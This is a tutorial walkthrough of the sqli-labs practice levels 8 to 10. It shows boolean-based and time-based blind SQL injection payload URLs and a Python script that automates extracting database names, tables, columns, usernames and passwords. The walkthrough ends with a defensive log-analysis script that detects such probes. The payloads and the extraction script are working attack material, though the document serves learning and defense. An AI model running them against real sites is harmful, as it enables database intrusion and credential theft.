Less8

As in the earlier levels, start by looking at the normal response:

    http://localhost/sqli-labs/Less-8/?id=1

Then close the string with a single quote:

    http://localhost/sqli-labs/Less-8/?id=1'

The problem in this level is that errors are not displayed, so the updatexml technique from the previous article cannot be used. In this situation you need "blind injection", which, put plainly, means guessing. For example:

    http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd

This guesses that the first letter of the database name is s. Of course we are not gods, so we will not guess right on the first try; in general you have to guess one character at a time. You can also borrow the idea of binary search: use greater-than and less-than comparisons to narrow the range step by step, which reduces the number of queries.

This way we can work out the current database name. The length of the string has to be found first; once the length is known, each character is tried in turn:

    http://localhost/sqli-labs/Less-8/?id=1' and LENGTH(DATABASE())=8 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 1, 1)='s' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 2, 1)='e' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 3, 1)='c' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 4, 1)='u' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 5, 1)='r' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 6, 1)='i' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 7, 1)='t' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr(database(), 8, 1)='y' -- asd

After comparing character by character, the name turns out to be security. The same method shows that the fourth table listed in information_schema.tables is named users:

    http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s' -- asd

The process of trying table after table and character after character is omitted here.

Next, the column names are found by blind injection in the same way:

    http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e' -- asd

    http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r' -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d' -- asd

After blind injection, the fourth and fifth column names match username and password.

Then the username and password are found by blind injection:

    http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(username) from users limit 0,1)=4 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 1, 1))=68 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 2, 1))=117 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 3, 1))=109 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select username from users limit 0,1), 4, 1))=98 -- asd

    http://localhost/sqli-labs/Less-8/?id=1' and (select LENGTH(password) from users limit 0,1)=4 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 1, 1))=68 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 2, 1))=117 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 3, 1))=109 -- asd
    http://localhost/sqli-labs/Less-8/?id=1' and ASCII(substr((select password from users limit 0,1), 4, 1))=98 -- asd

ASCII codes are used for matching here because usernames and passwords are case-sensitive, while MySQL's default configuration compares strings without regard to case. The database, table and column names above can be matched by ASCII code as well. If the database itself is case-sensitive, matching by ASCII code is required.

Less9

Level 9 is harder: whatever closing character you supply, the page returns the same thing. That means the page responds identically whether the condition is true or false. What can be done in that case? This is where "time-based blind injection" comes in. The approach is: if the injected condition is true, sleep for a while; if it is false, return immediately. Whether the request slept then tells you whether the condition was true. The injected conditions themselves are the ones from level 8.

For example, when we enter

    http://localhost/sqli-labs/Less-9/?id=1' and if(1=1,sleep(2),1) -- asd

the spinner in the top-left corner of the browser turns for about 2 seconds, and the browser developer tools (F12) show that the server waited 2 seconds before responding. That is time-based blind injection.

The same statements can therefore be used to find the database name:

    http://localhost/sqli-labs/Less-9/?id=1' and if(LENGTH(DATABASE())=8, sleep(2), 1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 1, 1)='s', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 2, 1)='e', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 3, 1)='c', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 4, 1)='u', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 5, 1)='r', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 6, 1)='i', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 7, 1)='t', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr(database(), 8, 1)='y', sleep(2),1) -- asd

Find the table name:

    http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(table_name) from information_schema.tables where table_schema=database() limit 3,1)=5, sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 1, 1)='u', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 2, 1)='s', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 3, 1)='e', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 4, 1)='r', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1), 5, 1)='s', sleep(2),1) -- asd

Find the column names:

    http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 4,1)=8, sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 1, 1)='u', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 2, 1)='s', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 3, 1)='e', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 4, 1)='r', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 5, 1)='n', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 6, 1)='a', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 7, 1)='m', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 4,1), 8, 1)='e', sleep(2),1) -- asd

    http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(column_name) from information_schema.columns where table_name='users' limit 5,1)=8, sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 1, 1)='p', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 2, 1)='a', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 3, 1)='s', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 4, 1)='s', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 5, 1)='w', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 6, 1)='o', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 7, 1)='r', sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_name='users' limit 5,1), 8, 1)='d', sleep(2),1) -- asd

Finally, find the username and password:

    http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(username) from users limit 0,1)=4, sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select username from users limit 0,1), 4, 1))=98, sleep(2),1) -- asd

    http://localhost/sqli-labs/Less-9/?id=1' and if((select LENGTH(password) from users limit 0,1)=4, sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 1, 1))=68, sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 2, 1))=117, sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 3, 1))=109, sleep(2),1) -- asd
    http://localhost/sqli-labs/Less-9/?id=1' and if(ASCII(substr((select password from users limit 0,1), 4, 1))=98, sleep(2),1) -- asd

Apart from the added if condition and sleep, this is essentially the same as level 8, so the results are not shown separately.

Time-based blind injection script

Trying these by hand one at a time is far too laborious unless you already know the answer, so a Python script can do the work:

    import requests
    import time

    # Candidate character codes: digits, ':', upper case, '_', lower case.
    db_ascii = [48,49,50,51,52,53,54,55,56,57,58,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,95,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122]
    user_pwd_ascii = []


    def get_method(url_params):
        # True when the response took at least as long as the injected sleep(2).
        t1 = time.time()
        # print(url_params)
        r = requests.get("http://localhost/sqli-labs/Less-8", params=url_params)
        t2 = time.time()
        if t2 - t1 >= 2:
            return True
        return False


    def check_database():
        # Length of the database name
        database_len = 0
        for i in range(100):
            params = {"id": "1' and if(LENGTH(DATABASE())=" + str(i) + ", sleep(2), 1) -- asd"}
            if get_method(params):
                database_len = i
                print("database name length is: " + str(database_len))
                break
        for j in range(database_len):
            for db_char in db_ascii:
                params = {"id": "1' and if(ASCII(substr(database(), " + str(j + 1) + ", 1))=" + str(db_char) + ", sleep(2),1) -- asd"}
                if get_method(params):
                    print(chr(db_char), end="")
                    break
                time.sleep(0.05)
        print()


    def check_table():
        # Number of tables
        table_num = 0
        for i in range(100):
            num_params = {"id": "1' and if((select count(1) from information_schema.tables where table_schema=database())=" + str(i) + ", sleep(2),1) -- asd"}
            if get_method(num_params):
                table_num = i
                print("table number is: " + str(table_num))
                break
        for k in range(table_num):
            # Length of the table name
            table_name_len = 0
            for l in range(100):
                tb_len_params = {"id": "1' and if((select LENGTH(table_name) from information_schema.tables where table_schema=database() limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}
                if get_method(tb_len_params):
                    table_name_len = l
                    print("table name length is: " + str(table_name_len))
                    break
            # Table name
            for j in range(table_name_len):
                for tb_char in db_ascii:
                    tb_name_params = {"id": "1' and if(ASCII(substr((select table_name from information_schema.tables where table_schema=database() limit " + str(k) + ",1), " + str(j + 1) + ", 1))=" + str(tb_char) + ", sleep(2),1) -- asd"}
                    if get_method(tb_name_params):
                        print(chr(tb_char), end="")
                        break
                    time.sleep(0.05)
            print()


    def check_column(tb_name):
        # Number of columns
        col_num = 0
        for i in range(100):
            num_params = {"id": "1' and if((select count(1) from information_schema.columns where table_name='" + tb_name + "')=" + str(i) + ", sleep(2),1) -- asd"}
            if get_method(num_params):
                col_num = i
                print("column number is: " + str(col_num))
                break
        for k in range(col_num):
            # Length of the column name
            col_name_len = 0
            for l in range(100):
                col_len_params = {"id": "1' and if((select LENGTH(column_name) from information_schema.columns where table_name='" + tb_name + "' limit " + str(k) + ",1)=" + str(l) + ", sleep(2),1) -- asd"}
                if get_method(col_len_params):
                    col_name_len = l
                    print("column name length is: " + str(col_name_len))
                    break
            # Column name
            for j in range(col_name_len):
                for col_char in db_ascii:
                    col_name_params = {"id": "1' and if(ASCII(substr((select column_name from information_schema.columns where table_name='" + tb_name + "' limit " + str(k) + ",1), " + str(j + 1) + ", 1))=" + str(col_char) + ", sleep(2),1) -- asd"}
                    if get_method(col_name_params):
                        print(chr(col_char), end="")
                        break
                    time.sleep(0.05)
            print()


    def check_username_password(tb_name, username_col, password_col, start, end):
        for i in range(start, end):
            # Length of the username
            username_len = 0
            for j in range(100):
                username_len_params = {"id": "1' and if((select LENGTH(" + username_col + ") from " + tb_name + " limit " + str(i) + ", 1)=" + str(j) + ", sleep(2),1) -- asd"}
                if get_method(username_len_params):
                    username_len = j
                    print("username length is: " + str(j))
                    break
            for k in range(username_len):
                for username_char in range(33, 127):
                    username_params = {"id": "1' and if(ASCII(substr((select " + username_col + " from " + tb_name + " limit " + str(i) + ",1), " + str(k + 1) + ", 1))=" + str(username_char) + ", sleep(2),1) -- asd"}
                    if get_method(username_params):
                        print(chr(username_char), end="")
                        break
                    time.sleep(0.05)
            print()
            # Length of the password
            password_len = 0
            for l in range(100):
                password_len_params = {"id": "1' and if((select LENGTH(" + password_col + ") from " + tb_name + " limit " + str(i) + ", 1)=" + str(l) + ", sleep(2),1) -- asd"}
                if get_method(password_len_params):
                    password_len = l
                    print("password length is: " + str(l))
                    break
            for m in range(password_len):
                for password_char in range(33, 127):
                    password_params = {"id": "1' and if(ASCII(substr((select " + password_col + " from " + tb_name + " limit " + str(i) + ",1), " + str(m + 1) + ", 1))=" + str(password_char) + ", sleep(2),1) -- asd"}
                    if get_method(password_params):
                        print(chr(password_char), end="")
                        break
                    time.sleep(0.05)
            print()


    if __name__ == "__main__":
        check_database()
        check_table()
        # check_column("users")
        # check_username_password("users", "username", "password", 0, 2)

This version is exhaustive; interested readers can write a binary-search version, which will be faster. The functions that look up the column names and the usernames and passwords take as arguments the table and column names obtained by the earlier functions.

Less10

Level 10 is the same as level 9 except that the closing character becomes a double quote, so it is not written up separately.
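Seen from the server side, the probing in Less 8 and Less 9 leaves a recognisable trail: many requests from one client whose id value differs only in a position, a number or a one-character literal, and, for the time-based variant, a response time that matches the sleep() argument. The following is an added example, not part of the original post, that finds both signals in an access log; the log layout, client addresses and function names are assumptions, and the log lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, quote, urlsplit

def make_line(client, lesson, payload, secs):
    # Assumed log layout: client, quoted request line, status, seconds to respond.
    return f'{client} "GET /sqli-labs/Less-{lesson}/?id={quote(payload)} HTTP/1.1" 200 {secs}'

# Constructed sample log: a normal visitor, a boolean-blind run, a time-based run.
SAMPLE_LOG = [
    make_line("10.0.0.5", 8, "1", 0.004),
    make_line("10.0.0.7", 8, "1' and length(database())=8 -- asd", 0.005),
    *[make_line("10.0.0.7", 8, f"1' and substr(database(),{i},1)='{c}' -- asd", 0.005)
      for i, c in enumerate("secu", 1)],
    *[make_line("10.0.0.9", 9, f"1' and if(substr(database(),1,1)='{c}',sleep(2),1) -- asd", t)
      for c, t in (("a", 0.004), ("b", 0.005), ("s", 2.006))],
]

LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" \d{3} ([\d.]+)$')
# SQL functions and schema names that the probes on this page rely on.
PRIMITIVE = re.compile(r"\b(?:substr|ascii|length|sleep)\s*\(|information_schema", re.I)
SLEEP = re.compile(r"\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.I)

def template(value):
    """Replace what a probe varies (one-character literals, numbers) with placeholders."""
    value = re.sub(r"'[^']'", "'?'", value.lower())
    return re.sub(r"\d+", "N", value)

def analyse(lines, min_run=3):
    """Return (enumeration runs per client, probes whose sleep() delay was observed)."""
    runs, delayed = Counter(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, target, secs = m.groups()
        for name, value in parse_qsl(urlsplit(target).query):  # URL-decodes the value
            if not PRIMITIVE.search(value):
                continue
            runs[(client, name, template(value))] += 1
            s = SLEEP.search(value)
            if s and float(secs) >= float(s.group(1)):
                delayed.append((client, value))
    return {key: n for key, n in runs.items() if n >= min_run}, delayed

if __name__ == "__main__":
    found_runs, found_delays = analyse(SAMPLE_LOG)
    for (client, param, tpl), n in found_runs.items():
        print(f"{client}: {n} probes on '{param}' sharing template {tpl}")
    for client, value in found_delays:
        print(f"{client}: response time matched sleep() in {value}")
```

A delayed entry means the injected condition was evaluated by the database, which confirms that the parameter reaches the query unparameterised and should be bound as a prepared-statement argument.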